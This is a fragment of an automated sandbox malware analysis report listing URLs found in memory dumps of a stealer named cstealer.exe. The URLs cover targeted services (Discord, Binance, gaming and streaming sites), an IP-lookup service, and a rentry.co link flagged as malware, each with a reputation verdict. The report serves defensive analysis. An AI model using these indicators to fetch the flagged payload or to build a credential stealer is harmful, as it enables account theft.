                                                                  https://hbo.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://binance.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://discord.gg/rcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://playstation.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535cstealer.exe, 00000003.00000003.2536067698.00000271DA060000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2627252924.00000271D9E66000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2650778065.00000271DA063000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542654022.00000271D9E65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102A87000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275350544.0000020102A8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sycstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://sellix.io)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://www.python.org/psf/license/main.exe, main.exe, 00000008.00000002.2222098181.00007FF8A8D68000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2503405873.00007FF8A8798000.00000004.00000001.01000000.0000001C.sdmpfalse
                                                                        		high
                                                                        https://twitter.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://disney.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://checkip.amazonaws.comcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyPcstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://wwwsearch.sf.net/):cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2547567041.00000271DA187000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tools.ietf.org/html/rfc6125#section-6.4.3cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://discord.com/api/v6/guilds/cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://tiktok.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://origin.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://telegram.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://riotgames.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://playstation.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://google.com/mailcstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://pornhub.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pycstealer.exe, 00000009.00000003.2199547261.0000020100D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmcstealer.exe, 00000003.00000003.2173619159.00000271DA3A1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.0000020103051000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://twitch.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		low
                                                                                      https://rentry.co/5uu99/rawcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
